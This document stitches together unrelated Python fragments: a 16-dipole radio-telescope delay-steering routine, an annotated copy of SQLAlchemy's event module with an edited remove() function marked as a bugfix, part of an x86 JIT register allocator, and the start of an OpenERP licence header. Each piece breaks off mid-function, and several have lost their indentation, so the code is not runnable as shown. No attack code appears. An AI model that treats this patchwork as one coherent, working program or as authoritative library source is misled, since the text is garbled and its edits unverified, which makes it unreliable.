# Define arrays to hold the positional offsets of the dipoles
xoffsets = [0.0] * 16 # offsets of the dipoles in the W-E 'x' direction
yoffsets = [0.0] * 16 # offsets of the dipoles in the S-N 'y' direction
delays = [0.0] * 16 # The calculated delays in picoseconds
rdelays = [0] * 16 # The rounded delays in units of delaystep
delaysettings = [0] * 16 # return values
# Check input sanity
if (abs(za) > 90):
return None
# Offsets of the dipoles are calculated relative to the
# center of the tile, with positive values being in the north
# and east directions
xoffsets[0] = -1.5 * dip_sep
xoffsets[1] = -0.5 * dip_sep
xoffsets[2] = 0.5 * dip_sep
xoffsets[3] = 1.5 * dip_sep
xoffsets[4] = -1.5 * dip_sep
xoffsets[5] = -0.5 * dip_sep
xoffsets[6] = 0.5 * dip_sep
xoffsets[7] = 1.5 * dip_sep
xoffsets[8] = -1.5 * dip_sep
xoffsets[9] = -0.5 * dip_sep
xoffsets[10] = 0.5 * dip_sep
xoffsets[11] = 1.5 * dip_sep
xoffsets[12] = -1.5 * dip_sep
xoffsets[13] = -0.5 * dip_sep
xoffsets[14] = 0.5 * dip_sep
xoffsets[15] = 1.5 * dip_sep
yoffsets[0] = 1.5 * dip_sep
yoffsets[1] = 1.5 * dip_sep
yoffsets[2] = 1.5 * dip_sep
yoffsets[3] = 1.5 * dip_sep
yoffsets[4] = 0.5 * dip_sep
yoffsets[5] = 0.5 * dip_sep
yoffsets[6] = 0.5 * dip_sep
yoffsets[7] = 0.5 * dip_sep
yoffsets[8] = -0.5 * dip_sep
yoffsets[9] = -0.5 * dip_sep
yoffsets[10] = -0.5 * dip_sep
yoffsets[11] = -0.5 * dip_sep
yoffsets[12] = -1.5 * dip_sep
yoffsets[13] = -1.5 * dip_sep
yoffsets[14] = -1.5 * dip_sep
yoffsets[15] = -1.5 * dip_sep
# First, figure out the theoretical delays to the dipoles
# relative to the center of the tile
# Convert to radians
azr = az * dtor
zar = za * dtor
for i in range(16):
# calculate exact delays in picoseconds from geometry...
delays[i] = (xoffsets[i] * math.sin(azr) + yoffsets[i] * math.cos(azr)) * math.sin(zar) / c
# Find minimum delay
mindelay = min(delays)
# Subtract minimum delay so that all delays are positive
for i in range(16):
delays[i] -= mindelay
# Now minimize the sum of the deviations^2 from optimal
# due to errors introduced when rounding the delays.
# This is done by stepping through a series of offsets to
# see how the sum of square deviations changes
# and then selecting the delays corresponding to the min sq dev.
# Go through once to get baseline values to compare
bestoffset = -0.45 * delaystep
minsqdev = 0
for i in range(16):
delay_off = delays[i] + bestoffset
intdel = int(round(delay_off / delaystep))
if (intdel > maxdelay):
intdel = maxdelay
minsqdev += math.pow((intdel * delaystep - delay_off), 2)
minsqdev = minsqdev / 16
offset = (-0.45 * delaystep) + (delaystep / 20.0)
while offset <= (0.45 * delaystep):
sqdev = 0
for i in range(16):
delay_off = delays[i] + offset
intdel = int(round(delay_off / delaystep))
if (intdel > maxdelay):
intdel = maxdelay
sqdev = sqdev + math.pow((intdel * delaystep - delay_off), 2)
sqdev = sqdev / 16
if (sqdev < minsqdev):
minsqdev = sqdev
bestoffset = offset
offset += delaystep / 20.0
for i in range(16):
rdelays[i] = int(round((delays[i] + bestoffset) / delaystep))
if (rdelays[i] > maxdelay):
if (rdelays[i] > maxdelay + 1):
return None # Trying to steer out of range.
rdelays[i] = maxdelay
# Set the actual delays
for i in range(16):
delaysettings[i] = int(rdelays[i])
if mode == 'EDA':
parrowlen = 20.0
parrowsw = 1.0
else:
parrowlen = 5.0
parrowsw = 0.2
north = v(0, 1, 0) # Due north, elevation 0 degrees
at1 = vpython.rotate(north, angle=(el * math.pi / 180),
axis=v(1, 0, 0)) # Rotate up (around E/W axis) by 'el' degrees
apvector = vpython.rotate(at1, angle=(-az * math.pi / 180),
| |
# sqlalchemy/event.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Base event API."""
from . import util, exc
from itertools import chain
import weakref
# Sentinel symbols for event listeners.
# NOTE(review): presumably returned by listeners to cancel processing or
# to indicate "no return value" -- they are not consumed in this module;
# confirm at the dispatch call sites.
CANCEL = util.symbol('CANCEL')
NO_RETVAL = util.symbol('NO_RETVAL')
def listen(target, identifier, fn, *args, **kw):
    """Register *fn* as a listener for event *identifier* on *target*.

    Example::

        from sqlalchemy import event
        from sqlalchemy.schema import UniqueConstraint

        def unique_constraint_name(const, table):
            const.name = "uq_%s_%s" % (
                table.name,
                list(const.columns)[0].name
            )

        event.listen(
            UniqueConstraint,
            "after_parent_attach",
            unique_constraint_name)

    """
    # Find the first Events subclass registered under this identifier
    # that knows how to adapt the given target.
    for event_cls in _registrars[identifier]:
        adapted = event_cls._accept_with(target)
        if adapted is not None:
            adapted.dispatch._listen(adapted, identifier, fn, *args, **kw)
            return
    raise exc.InvalidRequestError("No such event '%s' for target '%s'" %
                                  (identifier, target))
def listens_for(target, identifier, *args, **kw):
    """Decorator form of :func:`.listen` for the given target + identifier.

    Example::

        from sqlalchemy import event
        from sqlalchemy.schema import UniqueConstraint

        @event.listens_for(UniqueConstraint, "after_parent_attach")
        def unique_constraint_name(const, table):
            const.name = "uq_%s_%s" % (
                table.name,
                list(const.columns)[0].name
            )

    """
    def _decorate(listener):
        # Register at decoration time, then hand the function back
        # unchanged so it stays usable directly.
        listen(target, identifier, listener, *args, **kw)
        return listener
    return _decorate
def remove(target, identifier, fn):
    """Remove an event listener.

    Locates the first :class:`.Events` subclass registered under
    *identifier* that accepts *target*, and removes *fn* from its
    dispatch collection.

    Note that some event removals, particularly for those event dispatchers
    which create wrapper functions and secondary event listeners, may not yet
    be supported.
    """
    for evt_cls in _registrars[identifier]:
        # Bugfix: _accept_with() returns a single adapted target (or
        # None), exactly as consumed in listen() above -- it is not an
        # iterable.  The previous code iterated over its return value,
        # raising TypeError for None and mis-iterating real targets.
        tgt = evt_cls._accept_with(target)
        if tgt is not None:
            tgt.dispatch._remove(identifier, tgt, fn)
            return
# Global registry: event name -> list of Events classes defining that event.
_registrars = util.defaultdict(list)
def _is_event_name(name):
return not name.startswith('_') and name != 'dispatch'
class _UnpickleDispatch(object):
"""Serializable callable that re-generates an instance of
:class:`_Dispatch` given a particular :class:`.Events` subclass.
"""
def __call__(self, _parent_cls):
for cls in _parent_cls.__mro__:
if 'dispatch' in cls.__dict__:
return cls.__dict__['dispatch'].dispatch_cls(_parent_cls)
else:
raise AttributeError("No class with a 'dispatch' member present.")
class _Dispatch(object):
    """Mirror the event listening definitions of an Events class with
    listener collections.
    Classes which define a "dispatch" member will return a
    non-instantiated :class:`._Dispatch` subclass when the member
    is accessed at the class level. When the "dispatch" member is
    accessed at the instance level of its owner, an instance
    of the :class:`._Dispatch` class is returned.
    A :class:`._Dispatch` class is generated for each :class:`.Events`
    class defined, by the :func:`._create_dispatcher_class` function.
    The original :class:`.Events` classes remain untouched.
    This decouples the construction of :class:`.Events` subclasses from
    the implementation used by the event internals, and allows
    inspecting tools like Sphinx to work in an unsurprising
    way against the public API.
    """
    def __init__(self, _parent_cls):
        # The owning class whose instances this dispatcher serves.
        self._parent_cls = _parent_cls
    def _join(self, other):
        """Create a 'join' of this :class:`._Dispatch` and another.
        This new dispatcher will dispatch events to both
        :class:`._Dispatch` objects.
        Once constructed, the joined dispatch will respond to new events
        added to this dispatcher, but may not be aware of events
        added to the other dispatcher after creation of the join. This is
        currently for performance reasons so that both dispatchers need
        not be "evaluated" fully on each call.
        """
        # Build and cache the joined dispatcher class once per _Dispatch
        # subclass; the __dict__ check (not hasattr) avoids picking up a
        # cache created on a base class.
        if '_joined_dispatch_cls' not in self.__class__.__dict__:
            cls = type(
                "Joined%s" % self.__class__.__name__,
                (_JoinedDispatcher, self.__class__), {}
            )
            for ls in _event_descriptors(self):
                setattr(cls, ls.name, _JoinedDispatchDescriptor(ls.name))
            self.__class__._joined_dispatch_cls = cls
        return self._joined_dispatch_cls(self, other)
    def __reduce__(self):
        # Pickle support: re-derive the dispatcher from the parent class.
        return _UnpickleDispatch(), (self._parent_cls, )
    def _update(self, other, only_propagate=True):
        """Populate from the listeners in another :class:`_Dispatch`
        object."""
        for ls in _event_descriptors(other):
            getattr(self, ls.name).\
                for_modify(self)._update(ls, only_propagate=only_propagate)
    @util.hybridmethod
    def _clear(self):
        # Works at both class and instance level (hybridmethod).
        for attr in dir(self):
            if _is_event_name(attr):
                getattr(self, attr).for_modify(self).clear()
def _event_descriptors(target):
    # Collect the value of every event-named attribute on *target*.
    names = [attr for attr in dir(target) if _is_event_name(attr)]
    return [getattr(target, attr) for attr in names]
class _EventMeta(type):
    """Intercept new Event subclasses and create
    associated _Dispatch classes."""
    def __init__(cls, classname, bases, dict_):
        # Build the companion dispatch class before the normal type init.
        _create_dispatcher_class(cls, classname, bases, dict_)
        return type.__init__(cls, classname, bases, dict_)
def _create_dispatcher_class(cls, classname, bases, dict_):
    """Create a :class:`._Dispatch` class corresponding to an
    :class:`.Events` class."""
    # there's all kinds of ways to do this,
    # i.e. make a Dispatch class that shares the '_listen' method
    # of the Event class, this is the straight monkeypatch.
    base = getattr(cls, 'dispatch', _Dispatch)
    dispatch_cls = type("%sDispatch" % classname, (base, ), {})
    cls.dispatch = dispatch_cls
    dispatch_cls._listen = cls._listen
    # Mirror every event method as a class-level descriptor and register
    # the Events class under each event name.
    for name in dict_:
        if _is_event_name(name):
            setattr(dispatch_cls, name, _DispatchDescriptor(dict_[name]))
            _registrars[name].append(cls)
def _remove_dispatcher(cls):
    # Unregister *cls* from every event name it contributed, dropping
    # registry entries that become empty.
    for name in dir(cls):
        if not _is_event_name(name):
            continue
        _registrars[name].remove(cls)
        if not _registrars[name]:
            del _registrars[name]
class Events(util.with_metaclass(_EventMeta, object)):
    """Define event listening functions for a particular target type."""
    @classmethod
    def _accept_with(cls, target):
        # Mapper, ClassManager, Session override this to
        # also accept classes, scoped_sessions, sessionmakers, etc.
        if not hasattr(target, 'dispatch'):
            return None
        disp = target.dispatch
        # Accept either a dispatcher instance of our dispatch type, or
        # the dispatch class itself (class-level listening).
        compatible = isinstance(disp, cls.dispatch) or (
            isinstance(disp, type) and issubclass(disp, cls.dispatch))
        return target if compatible else None
    @classmethod
    def _listen(cls, target, identifier, fn, propagate=False, insert=False):
        collection = getattr(target.dispatch, identifier).\
            for_modify(target.dispatch)
        if insert:
            collection.insert(fn, target, propagate)
        else:
            collection.append(fn, target, propagate)
    @classmethod
    def _remove(cls, target, identifier, fn):
        getattr(target.dispatch, identifier).remove(fn, target)
    @classmethod
    def _clear(cls):
        cls.dispatch._clear()
class _DispatchDescriptor(object):
    """Class-level attributes on :class:`._Dispatch` classes."""
    def __init__(self, fn):
        # *fn* is the event method from the Events class; only its name
        # and docstring are retained, for introspection.
        self.__name__ = fn.__name__
        self.__doc__ = fn.__doc__
        # target class -> list of class-level listeners.  Weak keys so
        # the listener lists die with their target classes.
        self._clslevel = weakref.WeakKeyDictionary()
        # target class -> cached _EmptyListener, built lazily in __get__.
        self._empty_listeners = weakref.WeakKeyDictionary()
    def _contains(self, cls, evt):
        return cls in self._clslevel and \
            evt in self._clslevel[cls]
    def insert(self, obj, target, propagate):
        # NOTE(review): 'propagate' is accepted but never read here --
        # presumably consumed elsewhere; confirm before relying on it.
        assert isinstance(target, type), \
            "Class-level Event targets must be classes."
        # Breadth-first walk over target plus all current subclasses.
        stack = [target]
        while stack:
            cls = stack.pop(0)
            stack.extend(cls.__subclasses__())
            if cls is not target and cls not in self._clslevel:
                # First time we see this subclass: seed its listener list
                # from its MRO rather than prepending directly.
                self.update_subclass(cls)
            else:
                if cls not in self._clslevel:
                    self._clslevel[cls] = []
                self._clslevel[cls].insert(0, obj)
    def append(self, obj, target, propagate):
        # Same traversal as insert(), but appends instead of prepending.
        assert isinstance(target, type), \
            "Class-level Event targets must be classes."
        stack = [target]
        while stack:
            cls = stack.pop(0)
            stack.extend(cls.__subclasses__())
            if cls is not target and cls not in self._clslevel:
                self.update_subclass(cls)
            else:
                if cls not in self._clslevel:
                    self._clslevel[cls] = []
                self._clslevel[cls].append(obj)
    def update_subclass(self, target):
        # Initialize target's listener list with everything registered on
        # its base classes (deduplicated, MRO order).
        if target not in self._clslevel:
            self._clslevel[target] = []
        clslevel = self._clslevel[target]
        for cls in target.__mro__[1:]:
            if cls in self._clslevel:
                clslevel.extend([
                    fn for fn
                    in self._clslevel[cls]
                    if fn not in clslevel
                ])
    def remove(self, obj, target):
        # Remove from target and every subclass that has a listener list.
        stack = [target]
        while stack:
            cls = stack.pop(0)
            stack.extend(cls.__subclasses__())
            if cls in self._clslevel:
                self._clslevel[cls].remove(obj)
    def clear(self):
        """Clear all class level listeners"""
        for dispatcher in self._clslevel.values():
            dispatcher[:] = []
    def for_modify(self, obj):
        """Return an event collection which can be modified.
        For _DispatchDescriptor at the class level of
        a dispatcher, this returns self.
        """
        return self
    def __get__(self, obj, cls):
        # Class access returns the descriptor itself; instance access
        # returns (and memoizes on the instance) an _EmptyListener bound
        # to the instance's parent class.
        if obj is None:
            return self
        elif obj._parent_cls in self._empty_listeners:
            ret = self._empty_listeners[obj._parent_cls]
        else:
            self._empty_listeners[obj._parent_cls] = ret = \
                _EmptyListener(self, obj._parent_cls)
        # assigning it to __dict__ means
        # memoized for fast re-access. but more memory.
        obj.__dict__[self.__name__] = ret
        return ret
class _EmptyListener(object):
    """Serves as a class-level interface to the events
    served by a _DispatchDescriptor, when there are no
    instance-level events present.
    Is replaced by _ListenerCollection when instance-level
    events are added.
    """
    def __init__(self, parent, target_cls):
        # Make sure the descriptor has a class-level list for target_cls.
        if target_cls not in parent._clslevel:
            parent.update_subclass(target_cls)
        self.parent = parent  # the owning _DispatchDescriptor
        # Shared reference: class-level additions are visible immediately.
        self.parent_listeners = parent._clslevel[target_cls]
        self.name = parent.__name__  # the event name
        self.propagate = frozenset()
        # Immutable: this object never holds instance-level listeners.
        self.listeners = ()
    def for_modify(self, obj):
        """Return an event collection which can be modified.
        For _EmptyListener at the instance level of
        a dispatcher, this generates a new
        _ListenerCollection, applies it to the instance,
        and returns it.
        """
        result = _ListenerCollection(self.parent, obj._parent_cls)
        # Swap ourselves out of the memoized slot set up by
        # _DispatchDescriptor.__get__, if we are still the occupant.
        if obj.__dict__[self.name] is self:
            obj.__dict__[self.name] = result
        return result
    def _needs_modify(self, *args, **kw):
        raise NotImplementedError("need to call for_modify()")
    # All mutating operations are disabled on the shared empty listener.
    exec_once = insert = append = remove = clear = _needs_modify
    def __call__(self, *args, **kw):
        """Execute this event."""
        for fn in self.parent_listeners:
            fn(*args, **kw)
    def __len__(self):
        return len(self.parent_listeners)
    def __iter__(self):
        return iter(self.parent_listeners)
    def __bool__(self):
        return bool(self.parent_listeners)
    __nonzero__ = __bool__  # Python 2 truth-protocol alias
class _CompoundListener(object):
_exec_once = False
def exec_once(self, *args, **kw):
"""Execute this event, but only if it has not been
executed already for this collection."""
if not self._exec_once:
self(*args, **kw)
self._exec_once = True
# I'm not entirely thrilled about the overhead here,
# but this allows class-level listeners to be added
# at any point.
#
# In the absense of instance-level listeners,
# we stay with the _EmptyListener object when called
# at the instance level.
def __call__(self, *args, **kw):
"""Execute this event."""
for fn in self.parent_listeners:
fn(*args, **kw)
for fn in self.listeners:
fn(*args, **kw)
def __len__(self):
return len(self.parent_listeners) + len(self.listeners)
def __iter__(self):
return chain(self.parent_listeners, self.listeners)
def __bool__(self):
return bool(self.listeners or self.parent_listeners)
__nonzero__ = __bool__
class _ListenerCollection(_CompoundListener):
"""Instance-level attributes on instances of :class:`._Dispatch`.
Represents a collection of listeners.
As of 0.7.9, _ListenerCollection is only first
created via the _EmptyListener.for_modify() method.
"""
def __init__(self, parent, target_cls):
if target_cls not in parent._clslevel:
parent.update_subclass(target_cls)
self.parent_listeners = parent._clslevel[target_cls]
self.name = parent.__name__
self.listeners = []
self.propagate = set()
def for_modify(self, obj):
"""Return an event collection which can | |
|= r_uint(1) << (val % (WORD * 8))
return gcmap
def consider_gc_store(self, op):
args = op.getarglist()
base_loc = self.rm.make_sure_var_in_reg(op.getarg(0), args)
size_box = op.getarg(3)
assert isinstance(size_box, ConstInt)
size = size_box.value
assert size >= 1
if size == 1:
need_lower_byte = True
else:
need_lower_byte = False
value_loc = self.make_sure_var_in_reg(op.getarg(2), args,
need_lower_byte=need_lower_byte)
ofs_loc = self.rm.make_sure_var_in_reg(op.getarg(1), args)
self.perform_discard(op, [base_loc, ofs_loc, value_loc,
imm(size)])
def consider_gc_store_indexed(self, op):
args = op.getarglist()
base_loc = self.rm.make_sure_var_in_reg(op.getarg(0), args)
scale_box = op.getarg(3)
offset_box = op.getarg(4)
size_box = op.getarg(5)
assert isinstance(scale_box, ConstInt)
assert isinstance(offset_box, ConstInt)
assert isinstance(size_box, ConstInt)
factor = scale_box.value
offset = offset_box.value
size = size_box.value
assert size >= 1
if size == 1:
need_lower_byte = True
else:
need_lower_byte = False
value_loc = self.make_sure_var_in_reg(op.getarg(2), args,
need_lower_byte=need_lower_byte)
ofs_loc = self.rm.make_sure_var_in_reg(op.getarg(1), args)
self.perform_discard(op, [base_loc, ofs_loc, value_loc,
imm(factor), imm(offset), imm(size)])
    def consider_increment_debug_counter(self, op):
        """INCREMENT_DEBUG_COUNTER: the counter address needs no fixed
        register; pass through whatever location it currently has."""
        base_loc = self.loc(op.getarg(0))
        self.perform_discard(op, [base_loc])
def _consider_gc_load(self, op):
args = op.getarglist()
base_loc = self.rm.make_sure_var_in_reg(op.getarg(0), args)
ofs_loc = self.rm.make_sure_var_in_reg(op.getarg(1), args)
result_loc = self.force_allocate_reg(op)
size_box = op.getarg(2)
assert isinstance(size_box, ConstInt)
nsize = size_box.value # negative for "signed"
size_loc = imm(abs(nsize))
if nsize < 0:
sign_loc = imm1
else:
sign_loc = imm0
self.perform(op, [base_loc, ofs_loc, size_loc, sign_loc], result_loc)
consider_gc_load_i = _consider_gc_load
consider_gc_load_r = _consider_gc_load
consider_gc_load_f = _consider_gc_load
def _consider_gc_load_indexed(self, op):
args = op.getarglist()
base_loc = self.rm.make_sure_var_in_reg(op.getarg(0), args)
ofs_loc = self.rm.make_sure_var_in_reg(op.getarg(1), args)
result_loc = self.force_allocate_reg(op)
scale_box = op.getarg(2)
offset_box = op.getarg(3)
size_box = op.getarg(4)
assert isinstance(scale_box, ConstInt)
assert isinstance(offset_box, ConstInt)
assert isinstance(size_box, ConstInt)
scale = scale_box.value
offset = offset_box.value
nsize = size_box.value # negative for "signed"
size_loc = imm(abs(nsize))
if nsize < 0:
sign_loc = imm1
else:
sign_loc = imm0
locs = [base_loc, ofs_loc, imm(scale), imm(offset), size_loc, sign_loc]
self.perform(op, locs, result_loc)
consider_gc_load_indexed_i = _consider_gc_load_indexed
consider_gc_load_indexed_r = _consider_gc_load_indexed
consider_gc_load_indexed_f = _consider_gc_load_indexed
    def consider_int_is_true(self, op):
        """INT_IS_TRUE / INT_IS_ZERO: the result may live in a condition
        code instead of a general register."""
        # doesn't need arg to be in a register
        argloc = self.loc(op.getarg(0))
        resloc = self.force_allocate_reg_or_cc(op)
        self.perform(op, [argloc], resloc)
    consider_int_is_zero = consider_int_is_true
    def _consider_same_as(self, op):
        """SAME_AS_{I,R,F} and the ptr<->int casts: copy the argument's
        current location into a freshly allocated register."""
        argloc = self.loc(op.getarg(0))
        resloc = self.force_allocate_reg(op)
        self.perform(op, [argloc], resloc)
    consider_cast_ptr_to_int = _consider_same_as
    consider_cast_int_to_ptr = _consider_same_as
    consider_same_as_i = _consider_same_as
    consider_same_as_r = _consider_same_as
    consider_same_as_f = _consider_same_as
    def consider_load_from_gc_table(self, op):
        """LOAD_FROM_GC_TABLE: only needs a fresh GPR for the result."""
        resloc = self.rm.force_allocate_reg(op)
        self.perform(op, [], resloc)
    def consider_int_force_ge_zero(self, op):
        """INT_FORCE_GE_ZERO: argument in a register; the argument box is
        passed to force_allocate_reg, presumably as a forbidden var so
        result and input stay distinct -- confirm against its signature."""
        argloc = self.make_sure_var_in_reg(op.getarg(0))
        resloc = self.force_allocate_reg(op, [op.getarg(0)])
        self.perform(op, [argloc], resloc)
    def consider_load_effective_address(self, op):
        """LOAD_EFFECTIVE_ADDRESS: both operands in registers (each passed
        as the other's constraint list so they are allocated together),
        result in a third register; args 2 and 3 must be constants."""
        p0 = op.getarg(0)
        i0 = op.getarg(1)
        ploc = self.make_sure_var_in_reg(p0, [i0])
        iloc = self.make_sure_var_in_reg(i0, [p0])
        res = self.rm.force_allocate_reg(op, [p0, i0])
        assert isinstance(op.getarg(2), ConstInt)
        assert isinstance(op.getarg(3), ConstInt)
        # The two constant immediates are handed straight to the assembler.
        self.assembler.load_effective_addr(iloc, op.getarg(2).getint(),
                                           op.getarg(3).getint(), res, ploc)
    def _consider_math_read_timestamp(self, op):
        """MATH_READ_TIMESTAMP: pins eax/edx (presumably the RDTSC output
        pair -- confirm in the assembler); register choreography differs
        between 32- and 64-bit."""
        # hint: try to move unrelated registers away from eax and edx now
        self.rm.spill_or_move_registers_before_call([eax, edx])
        tmpbox_high = TempVar()
        self.rm.force_allocate_reg(tmpbox_high, selected_reg=eax)
        if longlong.is_64_bit:
            # on 64-bit, use rax as temporary register and returns the
            # result in rdx
            result_loc = self.rm.force_allocate_reg(op,
                                                    selected_reg=edx)
            self.perform_math(op, [], result_loc)
        else:
            # on 32-bit, use both eax and edx as temporary registers,
            # use a temporary xmm register, and returns the result in
            # another xmm register.
            tmpbox_low = TempVar()
            self.rm.force_allocate_reg(tmpbox_low, selected_reg=edx)
            xmmtmpbox = TempVar()
            xmmtmploc = self.xrm.force_allocate_reg(xmmtmpbox)
            result_loc = self.xrm.force_allocate_reg(op)
            self.perform_math(op, [xmmtmploc], result_loc)
            self.xrm.possibly_free_var(xmmtmpbox)
            self.rm.possibly_free_var(tmpbox_low)
        self.rm.possibly_free_var(tmpbox_high)
    def compute_hint_frame_locations(self, operations):
        """If the trace ends in a JUMP to an already-compiled LABEL,
        record location hints for the jump's arguments.  Optimization
        only; does nothing otherwise."""
        # optimization only: fill in the 'hint_frame_pos' dictionary
        # of 'fm' based on the JUMP at the end of the loop, by looking
        # at where we would like the boxes to be after the jump.
        op = operations[-1]
        if op.getopnum() != rop.JUMP:
            return
        self.final_jump_op = op
        self.final_jump_op_position = len(operations) - 1
        descr = op.getdescr()
        assert isinstance(descr, TargetToken)
        if descr._ll_loop_code != 0:
            # if the target LABEL was already compiled, i.e. if it belongs
            # to some already-compiled piece of code
            self._compute_hint_locations_from_descr(descr)
        #else:
        #   The loop ends in a JUMP going back to a LABEL in the same loop.
        #   We cannot fill 'hint_frame_pos' immediately, but we can
        #   wait until the corresponding consider_label() to know where the
        #   we would like the boxes to be after the jump.
        # YYY can we do coalescing hints in the new register allocation model?
    def _compute_hint_locations_from_descr(self, descr):
        """Record where the target LABEL wants each jump argument: frame
        slots become hint_frame_pos entries, register locations become
        fixed-register requests (first hint per box wins)."""
        arglocs = descr._x86_arglocs
        jump_op = self.final_jump_op
        assert len(arglocs) == jump_op.numargs()
        hinted = []
        for i in range(jump_op.numargs()):
            box = jump_op.getarg(i)
            if not isinstance(box, Const):
                loc = arglocs[i]
                if isinstance(loc, FrameLoc):
                    self.fm.hint_frame_pos[box] = self.fm.get_loc_index(loc)
                else:
                    # Only the first register hint for a given box is kept.
                    if box not in hinted:
                        hinted.append(box)
                        assert isinstance(loc, RegLoc)
                        self.longevity.fixed_register(
                            self.final_jump_op_position,
                            loc, box)
    def consider_jump(self, op):
        """Move every argument box into the location the target LABEL
        recorded for it, then emit the closing jump."""
        assembler = self.assembler
        assert self.jump_target_descr is None
        descr = op.getdescr()
        assert isinstance(descr, TargetToken)
        arglocs = descr._x86_arglocs
        self.jump_target_descr = descr
        # Part about non-floats
        src_locations1 = []
        dst_locations1 = []
        # Part about floats
        src_locations2 = []
        dst_locations2 = []
        # Build the four lists
        for i in range(op.numargs()):
            box = op.getarg(i)
            src_loc = self.loc(box)
            dst_loc = arglocs[i]
            if box.type != FLOAT and not box.is_vector():
                src_locations1.append(src_loc)
                dst_locations1.append(dst_loc)
            else:
                src_locations2.append(src_loc)
                dst_locations2.append(dst_loc)
        # Do we have a temp var?  (only on 64-bit are scratch regs reserved)
        if IS_X86_64:
            tmpreg = X86_64_SCRATCH_REG
            xmmtmp = X86_64_XMM_SCRATCH_REG
        else:
            tmpreg = None
            xmmtmp = None
        # Do the remapping
        num_moves = remap_frame_layout_mixed(assembler,
                                             src_locations1, dst_locations1, tmpreg,
                                             src_locations2, dst_locations2, xmmtmp)
        self.possibly_free_vars_for_op(op)
        assembler.closing_jump(self.jump_target_descr)
        assembler.num_moves_jump += num_moves
    def consider_enter_portal_frame(self, op):
        """ENTER_PORTAL_FRAME: no locations needed; forward to assembler."""
        self.assembler.enter_portal_frame(op)
    def consider_leave_portal_frame(self, op):
        """LEAVE_PORTAL_FRAME: no locations needed; forward to assembler."""
        self.assembler.leave_portal_frame(op)
    def consider_jit_debug(self, op):
        """JIT_DEBUG carries debug info only; nothing to allocate or emit."""
        pass
    def _consider_force_spill(self, op):
        """FORCE_SPILL: spill the argument to the frame unconditionally."""
        # This operation is used only for testing
        self.force_spill_var(op.getarg(0))
    def consider_force_token(self, op):
        """FORCE_TOKEN: materialize the frame token into a plain register
        (see the XXX note -- a frame register could be used instead)."""
        # XXX for now we return a regular reg
        #self.rm.force_allocate_frame_reg(op)
        self.assembler.force_token(self.rm.force_allocate_reg(op))
    def consider_label(self, op):
        """Pin down the locations of the LABEL's input arguments, record
        them on the TargetToken, and emit the label itself."""
        descr = op.getdescr()
        assert isinstance(descr, TargetToken)
        inputargs = op.getarglist()
        arglocs = [None] * len(inputargs)
        #
        # we use force_spill() on the boxes that are not going to be really
        # used any more in the loop, but that are kept alive anyway
        # by being in a next LABEL's or a JUMP's argument or fail_args
        # of some guard
        position = self.rm.position
        for arg in inputargs:
            assert not isinstance(arg, Const)
            if self.longevity[arg].is_last_real_use_before(position):
                self.force_spill_var(arg)
        #
        # we need to make sure that no variable is stored in ebp
        for arg in inputargs:
            if self.loc(arg) is ebp:
                loc2 = self.fm.loc(arg)
                self.assembler.mc.MOV(loc2, ebp)
        self.rm.bindings_to_frame_reg.clear()
        #
        # Record each argument's final location; registers are marked free
        # in the frame manager since the value now lives in the register.
        for i in range(len(inputargs)):
            arg = inputargs[i]
            assert not isinstance(arg, Const)
            loc = self.loc(arg)
            assert loc is not ebp
            arglocs[i] = loc
            if isinstance(loc, RegLoc):
                self.fm.mark_as_free(arg)
        #
        # if we are too close to the start of the loop, the label's target may
        # get overridden by redirect_call_assembler(). (rare case)
        self.flush_loop()
        #
        descr._x86_arglocs = arglocs
        descr._ll_loop_code = self.assembler.mc.get_relative_pos()
        descr._x86_clt = self.assembler.current_clt
        self.assembler.target_tokens_currently_compiling[descr] = None
        self.possibly_free_vars_for_op(op)
        self.assembler.label()
        #
        # if the LABEL's descr is precisely the target of the JUMP at the
        # end of the same loop, i.e. if what we are compiling is a single
        # loop that ends up jumping to this LABEL, then we can now provide
        # the hints about the expected position of the spilled variables.
        jump_op = self.final_jump_op
        if jump_op is not None and jump_op.getdescr() is descr:
            self._compute_hint_locations_from_descr(descr)
    def consider_guard_not_forced_2(self, op):
        """GUARD_NOT_FORCED_2: force all failargs out of registers
        (before_call with save_all_regs) and record the fail locations
        in the force descriptor."""
        self.rm.before_call(op.getfailargs(), save_all_regs=True)
        self.xrm.before_call(op.getfailargs(), save_all_regs=True)
        fail_locs = [self.loc(v) for v in op.getfailargs()]
        self.assembler.store_force_descr(op, fail_locs,
                                         self.fm.get_frame_depth())
        self.possibly_free_vars(op.getfailargs())
    def consider_keepalive(self, op):
        """KEEPALIVE only extends its argument's liveness for the
        allocator; no locations are needed and nothing is emitted."""
        pass
def _scaled_addr(self, index_loc, itemsize_loc,
base_loc, ofs_loc):
assert isinstance(itemsize_loc, ImmedLoc)
itemsize = itemsize_loc.value
if isinstance(index_loc, ImmedLoc):
temp_loc = imm(index_loc.value * itemsize)
shift = 0
else:
assert valid_addressing_size(itemsize), "rewrite did not correctly handle shift/mul!"
temp_loc = index_loc
shift = get_scale(itemsize)
assert isinstance(ofs_loc, ImmedLoc)
return AddressLoc(base_loc, temp_loc, shift, ofs_loc.value)
def consider_zero_array(self, op):
_, baseofs, _ = unpack_arraydescr(op.getdescr())
length_box = op.getarg(2)
scale_box = op.getarg(3)
assert isinstance(scale_box, ConstInt)
start_itemsize = scale_box.value
len_scale_box = op.getarg(4)
assert isinstance(len_scale_box, ConstInt)
len_itemsize = len_scale_box.value
# rewrite handles the mul of a constant length box
constbytes = -1
if isinstance(length_box, ConstInt):
constbytes = length_box.getint()
args = op.getarglist()
base_loc = self.rm.make_sure_var_in_reg(args[0], args)
startindex_loc = self.rm.make_sure_var_in_reg(args[1], args)
if 0 <= constbytes <= 16 * 8:
if IS_X86_64:
null_loc = X86_64_XMM_SCRATCH_REG
else:
null_box = TempVar()
null_loc = self.xrm.force_allocate_reg(null_box)
self.xrm.possibly_free_var(null_box)
self.perform_discard(op, [base_loc, startindex_loc,
imm(constbytes), imm(start_itemsize),
imm(baseofs), null_loc])
else:
# base_loc and startindex_loc are in two regs here (or they are
# immediates). Compute the dstaddr_loc, which is the raw
# address that we will pass as first argument to memset().
# It can be in the same register as either one, but not in
# args[2], because we're still needing the latter.
dstaddr_box = TempVar()
dstaddr_loc = self.rm.force_allocate_reg(dstaddr_box, [args[2]])
itemsize_loc = imm(start_itemsize)
dst_addr | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
